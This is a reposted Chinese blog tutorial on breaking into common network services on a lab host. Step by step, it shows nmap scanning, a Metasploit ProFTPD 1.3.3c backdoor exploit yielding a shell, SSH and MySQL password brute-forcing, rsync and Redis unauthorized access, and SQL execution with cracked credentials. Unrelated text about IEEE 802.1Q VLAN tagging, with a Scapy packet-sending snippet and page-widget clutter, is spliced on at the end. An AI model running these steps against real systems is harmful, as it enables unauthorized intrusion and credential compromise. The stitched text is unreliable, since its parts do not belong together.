常见端口入侵

.信息收集

nmap命令:

nmap -sS -p 1-65535 -sV 192.168.31.69

nmap --script=vuln 192.168.31.69

.端口利用

21端口入侵

首先看到ftp的版本是proftpd 1.3.3c,经过了解该版本存在后门,利用msf中的模块可以进行利用,利用过程如下:

利用命令:

msfconsole 启动终端

search proftpd 搜索利用模块

use exploit/unix/ftp/proftpd_133c_backdoor 使用后门模块

show options 查看需要设置的参数

set rhosts 192.168.31.69 设置目标ip

run 攻击

得到一个shell

22端口入侵

看到22端口就会想到ssh,想到ssh就想爆破一下试试,试试就试试

命令:

search ssh_login 搜索爆破模块

use auxiliary/scanner/ssh/ssh_login 使用爆破模块

show options 查看需要设置的参数

set rhosts 192.168.31.69 设置目标ip

set username root 设置用户名为root

set pass_file /root/passwd.txt 设置密码字典

set verbose true 显示爆破信息

run 攻击

ssh root@192.168.31.69 连接ssh

爆破出密码,用户为root密码为123456,并成功连接上ssh

873端口入侵

873端口搭的服务是rsync,通过百度得知该服务存在未授权访问漏洞,连接试试

命令:

rsync root@192.168.31.69:: 连接rsync

rsync root@192.168.31.69::www 连接rsync并查看www文件夹内的文件

3306端口入侵

3306端口也是可以尝试一下爆破,命令如下:

search mysql_login 搜索mysql爆破模块

use auxiliary/scanner/mysql/mysql_login 使用mysql爆破模块

show options 查看需要的参数

set rhosts 192.168.31.69 设置目标ip

set username root 设置用户名

set pass_file /root/passwd.txt 设置密码字典

run 攻击

search mysql_sql 搜索执行sql语句模块

use auxiliary/admin/mysql/mysql_sql 使用该模块

show options 查看需要的参数

set rhosts 192.168.31.69 设置目标ip

set username root 设置用户名

set password 123456 设置密码

set SQL show databases; 设置需要执行的sql语句

run 攻击

爆破出密码,用户名为root,密码为123456

执行show databases;成功列出所有数据库名

6379端口入侵

该端口使用的是redis服务,可能存在未授权访问漏洞,利用该漏洞需要安装redis,安装命令如下:

wget http://download.redis.io/releases/redis-2.8.12.tar.gz 下载redis

tar -xzf redis-2.8.12.tar.gz 解压

cd redis-2.8.12/ 切换到解压后的目录下

make 编译

cd /root/redis-2.8.12/src 切换到这个目录

./redis-cli -h 192.168.31.69 执行redis-cli连接

 

得到一个shell

 

转载于:https://www.cnblogs.com/xunta/p/10995230.html

03-19
### IEEE 802.1Q VLAN Tagging Protocol Standard IEEE 802.1Q 是支持虚拟局域网(VLAN)的标准协议之一,通常被称为 Dot1q。该标准定义了一种用于以太网帧的 VLAN 标记系统以及交换机和桥接器处理这些标记帧的操作流程[^2]。 #### 协议结构概述 IEEE 802.1Q 的核心功能在于通过在以太网数据帧中插入特定字段来实现 VLAN 标签的功能。这种标签使得网络设备能够识别哪些流量属于哪个 VLAN,并据此执行转发决策。具体来说: - **Tag Header**: 在原始以太网帧头部增加了一个额外的 4 字节字段作为 VLAN 标签头。这四个字节包含了以下部分: - **Priority Code Point (PCP)**: 使用 3 比特表示优先级级别,范围从 0 到 7,主要用于 QoS 控制。 - **Canonical Format Indicator (CFI)**: 这是一个单比特位,在传统以太网环境中设置为零。 - **VLAN Identifier (VID)**: 使用 12 比特标识具体的 VLAN ID,理论上可以支持多达 4096 个不同的 VLAN(编号从 0 至 4095),其中某些特殊值保留给内部用途或管理目的。 #### 数据包处理机制 当一个带有 VLAN tag 的数据包进入支持 IEEE 802.1Q 的交换机时,它会依据此标签决定如何路由或者过滤该数据流。如果目标端口不属于同一 VLAN,则不会传输至其他无关联的物理接口上;反之亦然——只有相同 VLAN 成员之间才允许互相通信除非经过路由器跨网段访问[^1]。 此外,为了简化管理和配置过程并增强互操作性,还引入了一些辅助性的子协议和服务组件比如 GARP(通用属性注册协议)。GARP 可帮助分发有关 VLAN 成员资格的信息到各个连接节点以便动态调整其行为模式而无需频繁手动干预[^3]。 以下是创建带 VLAN TAG 的 Python 示例代码片段展示如何模拟构建这样的 Ethernet Frame: ```python from scapy.all import Ether, Dot1Q, IP, sendp def create_vlan_packet(src_mac="00:aa:bb:cc:dd:ee", dst_mac="ff:ff:ff:ff:ff:ff", vlan_id=100, src_ip="192.168.1.1", dst_ip="192.168.1.2"): ether = Ether(src=src_mac, dst=dst_mac) dot1q = Dot1Q(vlan=vlan_id) ip_layer = IP(src=src_ip, dst=dst_ip) packet = ether / dot1q / ip_layer return packet packet = create_vlan_packet() sendp(packet, iface="eth0") # Replace 'eth0' with your network interface name. ``` 上述脚本利用 Scapy 库生成包含指定源地址、目的地址及所属 VLAN 编号的数据报文并通过选定的网卡发送出去测试实际效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值